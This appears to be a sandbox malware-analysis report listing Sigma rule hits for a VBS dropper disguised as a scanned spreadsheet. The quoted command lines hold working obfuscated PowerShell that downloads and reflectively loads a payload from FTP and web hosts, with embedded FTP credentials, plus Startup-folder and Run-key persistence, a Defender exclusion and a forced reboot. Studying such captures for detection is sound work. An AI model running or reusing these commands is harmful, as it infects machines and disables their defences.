'Jw' + [char]65 + 'o' + [char]65 + 'GU' + [char]65 + 'c' + [char]65 + 'B5' + [char]65 + 'FQ' + [char]65 + 'd' + [char]65 + 'Bl' + [char]65 +
                    Sigma detected: Potential PowerShell Command Line Obfuscation
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'EQ' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'EQ' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + 'BY' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'VQB1' + [char]65 + 'Gg' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 + 'B0' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cw' + [char]65 + '6' + [char]65 + 'C8' + [char]65 + 'LwB3' + [char]65 + 'Hc' + [char]65 + 'dw' + [char]65 + 'u' + [char]65 + 'Gc' + [char]65 + 'cgBh' + [char]65 + 'HQ' + [char]65 + 'aQB0' + [char]65 + 'HU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + 'HM' + [char]65 + 'ZQBl' + [char]65 + 'Gs' + [char]65 + 'ZQBy' + [char]65 + 'HM' + [char]65 + 'LgBj' + [char]65 + 'G8' + [char]65 + 'bQ' + [char]65 + 'v' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65 + '' + [char]65 + 't' + [char]65 + 'Gk' + [char]65 + 'bgBj' + [char]65 + 'Gw' + [char]65 + 'dQBk' + [char]65 + 'GU' + [char]65 + 'cw' + [char]65 + 'v' + [char]65 + 'GM' + [char]65 + 'dQBz' + [char]65 + 'HQ' + [char]65 + 'bwBt' + [char]65 + 'Gk' + [char]65 + 'egBl' + [char]65 + 'C8' + [char]65 + 'YwBz' + [char]65 + 'HM' + [char]65 + 'LwBi' + [char]65 + 'GQ' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'F0' + [char]65 + 'XQBb' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBv' + [char]65 + 'Fs' + [char]65 + 'I' + [char]65 + '' + [char]65 + 's' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'b' + [char]65 + 'Bs' + [char]65 + 'HU' + [char]65 + 'bg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'Gs' + [char]65 + 'bwB2' + [char]65 + 'G4' + [char]65 + 'SQ' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Ek' + [char]65 + 'VgBG' + [char]65 + 'HI' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bk' + [char]65 + 'G8' + [char]65 + 'a' + [char]65 + 'B0' + [char]65 + 'GU' + [char]65 + 'TQB0' + [char]65 + 'GU' + [char]65 + 'Rw' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'Jw' + [char]65 + 'x' + [char]65 + 'HM' + [char]65 + 'cwBh' + [char]65 + 'Gw' + [char]65 + 'Qw' + [char]65 + 'u' + [char]65 + 'DM' + [char]65 + 'eQBy' + [char]65 + 'GE' + [char]65 + 'cgBi' + [char]65 + 'Gk' + [char]65 + 'T' + [char]65 + 'Bz' + [char]65 + 'HM' + [char]65 + 'YQBs' + [char]65 + 'EM' + [char]65 + 'Jw' + [char]65 + 'o' + [char]65 + 'GU' + [char]65 + 'c' + [char]65 + 'B5' + [char]65 + 'FQ' + [char]65 + 'd' + [char]65 + 'Bl' + [char]65 +
                    Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointM
                    Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'EQ' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'EQ' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + 'BY' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'VQB1' + [char]65 + 'Gg' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 + 'B0' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cw' + [char]65 + '6' + [char]65 + 'C8' + [char]65 + 'LwB3' + [char]65 + 'Hc' + [char]65 + 'dw' + [char]65 + 'u' + [char]65 + 'Gc' + [char]65 + 'cgBh' + [char]65 + 'HQ' + [char]65 + 'aQB0' + [char]65 + 'HU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + 'HM' + [char]65 + 'ZQBl' + [char]65 + 'Gs' + [char]65 + 'ZQBy' + [char]65 + 'HM' + [char]65 + 'LgBj' + [char]65 + 'G8' + [char]65 + 'bQ' + [char]65 + 'v' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65 + '' + [char]65 + 't' + [char]65 + 'Gk' + [char]65 + 'bgBj' + [char]65 + 'Gw' + [char]65 + 'dQBk' + [char]65 + 'GU' + [char]65 + 'cw' + [char]65 + 'v' + [char]65 + 'GM' + [char]65 + 'dQBz' + [char]65 + 'HQ' + [char]65 + 'bwBt' + [char]65 + 'Gk' + [char]65 + 'egBl' + [char]65 + 'C8' + [char]65 + 'YwBz' + [char]65 + 'HM' + [char]65 + 'LwBi' + [char]65 + 'GQ' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'F0' + [char]65 + 'XQBb' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBv' + [char]65 + 'Fs' + [char]65 + 'I' + [char]65 + '' + [char]65 + 's' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'b' + [char]65 + 'Bs' + [char]65 + 'HU' + [char]65 + 'bg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'Gs' + [char]65 + 'bwB2' + [char]65 + 'G4' + [char]65 + 'SQ' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Ek' + [char]65 + 'VgBG' + [char]65 + 'HI' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bk' + [char]65 + 'G8' + [char]65 + 'a' + [char]65 + 'B0' + [char]65 + 'GU' + [char]65 + 'TQB0' + [char]65 + 'GU' + [char]65 + 'Rw' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'Jw' + [char]65 + 'x' + [char]65 + 'HM' + [char]65 + 'cwBh' + [char]65 + 'Gw' + [char]65 + 'Qw' + [char]65 + 'u' + [char]65 + 'DM' + [char]65 + 'eQBy' + [char]65 + 'GE' + [char]65 + 'cgBi' + [char]65 + 'Gk' + [char]65 + 'T' + [char]65 + 'Bz' + [char]65 + 'HM' + [char]65 + 'YQBs' + [char]65 + 'EM' + [char]65 + 'Jw' + [char]65 + 'o' + [char]65 + 'GU' + [char]65 + 'c' + [char]65 + 'B5' + [char]65 + 'FQ' + [char]65 + 'd' + [char]65 + 'Bl' + [char]65 +
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, CommandLine: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6764, ParentProcessName: powershell.exe, ProcessCommandLine: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, ProcessId: 4924, ProcessName: powershell.exe
                    Sigma detected: WScript or CScript Dropper
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs", ProcessId: 1492, ProcessName: wscript.exe
                    Sigma detected: Change PowerShell Policies to an Insecure Level
                    Source: Process startedAuthor: frack113: Data: Command: powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1", CommandLine: powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6764, ParentProcessName: powershell.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1", ProcessId: 5424, ProcessName: powershell.exe
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5424, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_vuw
                    Sigma detected: PowerShell Download Pattern
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointM
                    Sigma detected: PowerShell Script Run in AppData
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: Data: Command: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit, CommandLine: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit, ProcessId: 876, ProcessName: cmd.exe
                    Sigma detected: PowerShell Web Download
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointM
                    Sigma detected: Powershell Defender Exclusion
